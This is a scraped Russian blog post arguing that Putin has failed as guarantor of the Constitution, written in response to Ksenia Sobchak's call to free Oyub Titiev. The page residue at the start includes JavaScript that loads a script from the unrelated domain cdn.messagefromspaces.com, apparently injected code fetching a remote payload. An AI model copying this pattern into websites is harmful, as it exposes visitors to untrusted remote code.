, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Кто и кому должен это доказать?

13 Янв

Ксения Собчак об аресте главы чеченского «Мемориала»: «Я требую немедленно освободить Оюба Титиева! Докажите, что Чечня — это Россия!» https://sobchakprotivvseh.ru/blog/269

Разве в России не творится тот самый произвол, который, если верить публикации, произошёл с Оюбом Титиевым?

Еще недавно Ксения приводила убедительные данные о творимом произволе в полиции https://sobchakprotivvseh.ru/blog/41  На это сообщение ей хоть кто-то из официальных лиц,  ответил? А почему по этому поводу молчит сама Ксения?

Разве были сделаны выводы из события, связанных с адвокатом  Артуром Прелем, которому офицер ФСБ подбросил наркотики? https://www.antisud.com/forum/forum5/topic188/

В опубликованном высшей судебной инстанции обзоре судебной практики по уголовным делам о преступлениях, связанных с незаконным оборотом наркотических средств, рекомендуется людям в мантиях не поддаваться на полицейские провокации: если тайные агенты буквально толкают человека на преступления, судить его за это нельзя https://rg.ru/2012/07/03/provokaciya-site.html

Но когда это судьи прислушивались к рекомендациям Верховного Суда РФ?

Можно ежедневно приводить множество примеров доказывающих полицейский произвол, но ситуация к лучшему не меняется.

Поэтому хватит приводить очередные факты произвола. Пора уже понять, что в стране нет гаранта Конституции, который обеспечил бы работу правоохранительных и судебных органов по требованиям Конституции и порядку судопроизводства.

Почти 25 лет в России действует Конституция, в которой выражена воля единственного источника власти в стране, её многонационального народа. В этом документе страны изложены основы государственного устройства страны, обязанности органов власти и должностных лиц. Утверждается, что каждому гарантируются основные права и свободы.

При этом указано, что гарантом Конституции России является Президент России.

Прежде всего «гарант Конституции» — это не модный термин, а это Конституционная обязанность Президента России. Из всего многообразия значений слова «гарант», наиболее точно его сущность отражает слово «обеспечивает».

Только Президент России является тем лицом, которое обязано не допустить ревизий Конституционных гарантий прав и свобод человека и гражданина. Только Президент России наделён правом наложить вето на любой принятый Госдумой закон, который нарушает требования Конституции страны, например, по  изданию законов, отменяющих или умаляющих права и свободы человека и гражданина.

Только гарант Конституции обязан исключить из правоприменительной практики методики доказывания преступлений, основанные на фальсификациях и  только признательных показаниях арестованных.

Вот Мосгорсуд https://www.gazeta.ru/social/2017/04/27/10646999.shtml   вынес приговор по делу генерал-лейтенанта полиции и бывшего руководителя Главного управления экономической безопасности и противодействия коррупции (ГУЭБиПК) Дениса Сугробова, а также восьмерых его подчиненных, которые повышали раскрываемость корыстными методами. Согласно тексту приговора суда, генерал создал преступную группу из своих подчиненных, допустил множество фактов превышения должностных полномочий, а также организовал «провокацию взятки».

Но разве случаи с «провокацией взяток» этим в России устранили?

Поэтому кандидату в президенты России Ксении Собчак надо аргументированно разъяснить своим избирателям, почему Путин так и не смог стать гарантом Конституции и, что она сделает, став президентом страны.

Гарантом Конституции России не является Конституционный Суд России. Он только правомочен установить соответствует ли нормативный акт Конституции России, или нет.

Поэтому каждое решение Конституционного Суда РФ, которым удостоверяется, что принятый закон противоречит Конституции, следует рассматривать, как брак в работе гаранта Конституции России, поскольку только после подписания Президентом принятого Госдумой и Советом Федерации закона, и его опубликования, он становится Законом.

Анализ решений Конституционного Суда РФ показывает, что за последние 20 лет гарантом Конституции было подписано множество законов, которые умаляли права и свободы человека и гражданина http://rapsinews.ru/judicial_news/20140325/271004905.html

Это свидетельствует и о том, что в правовом управлении президента нет настоящих правоведов.

Но с огорчением могу признать и то, что в окружении Ксении таких правоведов что-то не усматриваю.

Россию может спасти только власть Конституции, обеспеченная её гарантом и правосудием. Никто из кандидатов в президенты этого даже не понимает.

Если Ксения этого не осознает и не изменит свою предвыборную программу, никакого успеха от её участия в выборах ожидать не стоит.

Критики того, что  Путин так и не стал гарантом Конституции России, фактически нет, поэтому и нет соперников у Путина. Шесть лет ничем не умеряемого самовластия и несправедливости нам обеспечены.

Желающий стать президентом России обязан доказать россиянам, что он справится с теми проблемами, с которыми не справился действующий президент.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.